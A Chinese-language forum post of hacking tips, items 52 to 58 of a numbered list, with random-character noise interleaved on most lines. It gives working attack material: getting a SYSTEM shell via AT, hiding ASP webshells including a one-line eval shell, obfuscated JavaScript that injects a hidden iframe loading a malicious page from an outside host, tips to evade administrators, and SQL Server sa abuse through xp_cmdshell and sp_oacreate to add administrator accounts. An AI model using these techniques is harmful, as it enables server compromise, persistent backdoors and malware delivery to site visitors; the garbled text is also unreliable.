9 M5 _3 u- \' K) ~8 u% k; R52、at "12:17" /interactive cmd8 G U. w1 e6 G" B3 m
执行后可以用AT命令查看新加的任务$ g* G/ N9 v0 i+ ?7 u
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。- {% O8 p0 M: {! K x4 @- W
# y; H& i# v3 z& N2 R. b53、隐藏ASP后门的两种方法. _; i( r8 V! Z( _4 J$ }
1、建立非标准目录:mkdir images..\: n: w3 L& c: M3 {5 `' e; u
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
$ y& S1 ]; n, ?5 @, }" q通过web访问ASP木马:http://ip/images../news.asp?action=login) s5 x( H8 ~% ~1 e' Q; R9 E
如何删除非标准目录:rmdir images..\ /s
% w) H) S4 K0 E, v6 X6 g% [2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:; a+ W& l! H7 L" j0 m! }
mkdir programme.asp
0 i7 p5 L/ A1 M) F6 K) g! t新建1.txt文件内容:<!--#include file=”12.jpg”-->
! F0 G$ `8 u: r9 w7 E5 f新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
+ J2 [4 ?7 A1 T! ?attrib +H +S programme.asp
% p; J \& c6 ]5 E& O通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
+ g/ v |1 P1 d* M3 q0 e4 ~& u3 l$ J: b! u7 \- y! i
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。 J! |) {1 H6 l1 a* s3 H' l6 B! s
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
d% y" U. M: L- U0 G3 }& `& a; ~$ r3 G4 q
55、JS隐蔽挂马0 @" U( T) a; X _' C
1.5 J4 ?" B$ {; P4 ~7 @. w
var tr4c3="<iframe src=ht";
, t7 X( h$ O1 ^- y9 ~tr4c3 = tr4c3+"tp:/";
& W9 F/ c2 z ~# }0 Ztr4c3 = tr4c3+"/ww";
9 X$ Q, w- S' Dtr4c3 = tr4c3+"w.tr4";! K" e; g K2 j7 s
tr4c3 = tr4c3+"c3.com/inc/m";" ~/ ]8 {) K* @" c- w
tr4c3 = tr4c3+"m.htm style="display:none"></i";
* v) z1 Q* Q) Qtr4c3 =tr4c3+"frame>'";. G, j! f" O) g. L3 X
document.write(tr4c3);
0 H( }! F4 q, h/ f1 ^; v避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。: M( N' h! M8 |* m/ D9 k# K
+ @9 n. x/ B& F2 w. U% q' i
2.* n9 \$ C4 I3 w% L- y
转换进制,然后用EVAL执行。如8 K k/ d9 I8 o
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");/ Y& @$ k2 s9 @5 |) S8 j: D7 ^' ?3 v
不过这个有点显眼。7 I' w2 c6 E6 x" b+ g, Y( C2 F
3.6 Y, y5 l/ [( g6 a% l9 F+ {9 X
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% {4 r. L: O) S) f/ s. e/ s最后一点,别忘了把文件的时间也修改下。, y: B5 N+ t9 @8 c, z! t1 R; J
9 Z2 l9 u/ f0 g ]4 }; B9 l& G/ ^ A
56.3389终端入侵常用DOS命令! ^$ s6 B' f9 u
taskkill taskkill /PID 1248 /t9 P: y0 Q) f' v! u1 V% L, F
4 O5 V/ u0 R; v6 ~8 `5 y
tasklist 查进程
& A, O v j$ Y! Q1 N9 N
3 Y9 q3 L$ @( Ocacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限4 \/ M. {9 Z- o* ?/ X& e
iisreset /reboot7 ]# S+ g7 Q6 x0 K8 {( V# f& `# h
tsshutdn /reboot /delay:1 重起服务器 p7 M# l9 ]1 T3 j% w5 {
1 J k' l. _3 W& x" p- f- E3 P% flogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ q9 V. S# {% V+ U R4 l
2 C8 c; G" ?1 \1 dquery user 查看当前终端用户在线情况
. D. V" ]2 {! ^' J2 L8 H
* P8 d. {; X' X( S$ f* l要显示有关所有会话使用的进程的信息,请键入:query process *1 H7 D' ~5 [) m3 x
9 A+ D3 J/ [' \ B* m
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 n* L: ?1 q& N& t0 Q! o, x
1 S2 J ^1 Q. f* Z# o
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2( f2 Y) Z# F) v, O9 T
% n, f# A3 H. g' W j8 {1 Z
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM022 Y V3 A5 q/ g: _" }: X/ @
4 R+ z5 |' V" A! u) b$ m3 p8 b
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
. J4 y+ j2 h. t8 ~/ J* y7 U z! ~9 D9 |: B: ~3 d# I: e
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- F5 Q" J/ L5 {# l& l; w8 h9 c6 _+ s/ z5 N
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。: \0 ^9 ^7 |. l: O% k
9 h; j8 ~5 m& r7 }9 l/ _
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
6 P0 n( H4 t1 ~, ~3 W. a4 d& D$ o* s$ A) K/ D/ l0 `
56、在地址栏或按Ctrl+O,输入:# F) G3 Y/ u/ J& w" { l% X
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;8 m' g9 j/ u+ @. p0 b
: _( M, Z+ C3 Q3 n3 l8 z) ?( T5 l7 U
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。$ h: f4 {3 j: ]: x8 e' f
5 i- J1 t! q. H- i6 x57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
! ~; ]/ W& H$ p& o( P用net localgroup administrators是可以看到管理组下,加了$的用户的。
' s L( v$ G! o9 l
) ?. O8 x; ]* k$ q p. D! T58、 sa弱口令相关命令* f* i4 d$ Z8 b9 V. {
9 c5 }- l- {( [' h* N一.更改sa口令方法:$ X: L2 ^% N% ^( V
用sql综合利用工具连接后,执行命令:& p$ [' O! T9 d9 Q' ^; Y
exec sp_password NULL,'20001001','sa'- u8 \1 ?" r7 p* z$ X
(提示:慎用!)
5 |4 U/ r/ k2 }6 h4 O/ V% I7 u
二.简单修补sa弱口令.
+ R3 ~! _6 Y; V- j, V1 H
7 ]$ q+ e6 i$ k方法1:查询分离器连接后执行:
+ K' t; T4 r, n+ n) |) Yif exists (select * from7 G' I+ R: D3 }1 ]
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and3 u( q/ c" q/ i+ f4 Z
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)# r% c9 R/ z9 n; ]
0 z( F. r- O" j- `5 h2 b
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
; w' N6 l- E4 L+ j( ^
: M8 [5 V4 r; |. o' B9 X+ m& ^" cGO% ^8 V2 @) R- T; T. I) y" U
+ p- a$ G/ C- X( w' E2 \% Y+ w0 i
然后按F5键命令执行完毕
* P+ }( A. g! c* M% h3 _& A0 _. U6 A3 @- Q* [6 a1 d3 n8 m
方法2:查询分离器连接后
/ a$ R: \1 j4 h' Z6 E第一步执行:use master
3 l, g5 R3 u4 @. j# I) U第二步执行:sp_dropextendedproc 'xp_cmdshell'
* B+ b" Q9 ^: a! j8 F A* o, u然后按F5键命令执行完毕% p$ h/ q( h5 x: Y5 o
) |$ y N3 h t2 o
, E3 |4 |- ^% S; D3 X' ]5 p三.常见情况恢复执行xp_cmdshell.4 Q- c9 x8 s, W* R/ r
( `3 ^# M2 _: d; L/ M, G6 z! ]% \# B; m
1 未能找到存储过程'master..xpcmdshell'.
, O* H ?6 L, K8 p3 Y: k: Q 恢复方法:查询分离器连接后,
s/ M+ Y Q' [4 U( v# h第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int" Q$ ~) V" ]' [" B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', G( a9 O0 V" W; J
然后按F5键命令执行完毕
2 R( a8 U. M7 k! }' @( S3 d) Q* T* u7 @/ P% a+ G5 ^
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' e t6 |. C) I! G8 M
恢复方法:查询分离器连接后,
- B- C3 e n" I第一步执行:sp_dropextendedproc "xp_cmdshell"
+ L: E4 O0 i% }第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'/ [: e! ]1 z: g( z5 E8 a
然后按F5键命令执行完毕4 F" ]" V: H/ i& p: `$ Z
5 t' }# T- r1 c5 @" T; }+ s( c3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)1 V5 u% b/ l1 \
恢复方法:查询分离器连接后,
; V/ \5 m7 T+ g* K5 f1 h第一步执行:exec sp_dropextendedproc 'xp_cmdshell'! h3 e6 R) Y* m; M! G
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
$ {7 a2 l- v0 O7 N- s$ v B然后按F5键命令执行完毕
! y! d4 } a$ d2 q" M# F! g
`0 h* V; X* y7 [: P四.终极方法.
, ]3 T _2 i5 z9 J如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 N5 N0 l4 Q; x: i4 A R- }
查询分离器连接后,7 x, x* j& e- O3 U) Z& s- X
2000servser系统:& d: N1 z( S( h- `3 ^$ y0 L+ `( ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* {/ u7 g W+ p# G9 A* J# N3 }; T- ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
0 H( L7 U+ y$ l- q% N/ U* |. k; d5 A4 }4 a0 t# \0 v. N7 n; s
xp或2003server系统:4 _7 W- ~2 f8 q" N4 ]. Q$ ^
8 [$ V) E+ g$ q: V* U! A& pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'; k" K; Z1 K; O* N8 e5 ~9 \
4 u H4 Q3 @$ D9 v3 o( }3 Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: U K) S6 Y7 Y2 p, G8 C' ]' N6 b0 | |
发表于 2012-9-15 14:13:15
收藏
支持
反对